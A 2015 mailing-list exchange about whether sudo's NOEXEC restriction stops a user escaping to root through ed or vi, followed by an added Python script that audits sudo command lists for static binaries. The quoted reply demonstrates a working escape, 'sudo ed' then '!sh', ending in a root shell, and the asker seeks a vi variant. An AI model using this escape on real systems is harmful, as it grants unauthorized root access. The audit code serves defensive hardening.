"Yeah, that LD_PRELOAD trick NOEXEC uses doesn't work so well with
static executables."

Thank you, so there is a way of tricking noexec with vi to get a root shell.
But how exactly? Why isn't it fixed? :O

On Mon, Apr 27, 2015 at 9:49 PM, Christian Weisgerber <na...@mips.inka.de>
wrote:

> On 2015-04-27, "whynot sudo" <whynots...@safe-mail.net> wrote:
>
> > Cmnd_Alias FOO = /bin/ed, /usr/bin/ed, /usr/bin/vi
> > foouser LOCALHOST = NOPASSWD: NOEXEC: FOO
> >
> > Can the "foouser" escape to root prompt?
>
> Let's try!
>
> $ sudo ed
> !sh
> # id
> uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty),
> 5(operator), 20(staff), 31(guest)
> #
>
> Yeah, that LD_PRELOAD trick NOEXEC uses doesn't work so well with
> static executables.
>
> --
> Christian "naddy" Weisgerber                          na...@mips.inka.de
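
An audit check for the point made in the quoted reply, as an added example (not part of the thread and not sudo's code): LD_PRELOAD is processed by the dynamic linker, so an ELF binary with no PT_INTERP program header never loads a preloaded noexec shim. The function names and the sample images are constructed for illustration; on a real host, pass the paths from the NOEXEC Cmnd_Alias and leave `read` at its default.

```python
import struct

PT_INTERP = 3  # program header that names the dynamic linker (ld.so)

def has_interp(image: bytes) -> bool:
    """True if the ELF image requests a dynamic linker (PT_INTERP present)."""
    if image[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64 = image[4] == 2                      # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    end = "<" if image[5] == 1 else ">"       # EI_DATA: 1 = little endian
    if is64:
        phoff, = struct.unpack_from(end + "Q", image, 0x20)
        phentsize, phnum = struct.unpack_from(end + "HH", image, 0x36)
    else:
        phoff, = struct.unpack_from(end + "I", image, 0x1C)
        phentsize, phnum = struct.unpack_from(end + "HH", image, 0x2A)
    for i in range(phnum):
        p_type, = struct.unpack_from(end + "I", image, phoff + i * phentsize)
        if p_type == PT_INTERP:
            return True
    return False

def noexec_ineffective(paths, read=lambda p: open(p, "rb").read()):
    """Commands for which an LD_PRELOAD-based NOEXEC cannot take effect."""
    return [p for p in paths if not has_interp(read(p))]

def make_elf64(p_types):
    """Constructed sample: 64-bit little-endian ELF header plus bare program headers."""
    hdr = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9)
    hdr += struct.pack("<HHIQQQIHHHHHH", 2, 62, 1, 0, 64, 0, 0,
                       64, 56, len(p_types), 0, 0, 0)
    return hdr + b"".join(struct.pack("<I", t) + bytes(52) for t in p_types)

# Constructed stand-ins keyed by paths from the Cmnd_Alias above; which real
# binaries are static depends on the system being audited.
SAMPLE = {
    "/bin/ed": make_elf64([1, 1]),          # PT_LOAD only: static
    "/usr/bin/vi": make_elf64([6, 3, 1]),   # PT_PHDR, PT_INTERP, PT_LOAD: dynamic
}

if __name__ == "__main__":
    for path in noexec_ineffective(SAMPLE, read=SAMPLE.__getitem__):
        print(f"{path}: no PT_INTERP, preload-based NOEXEC will not restrict it")
```
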
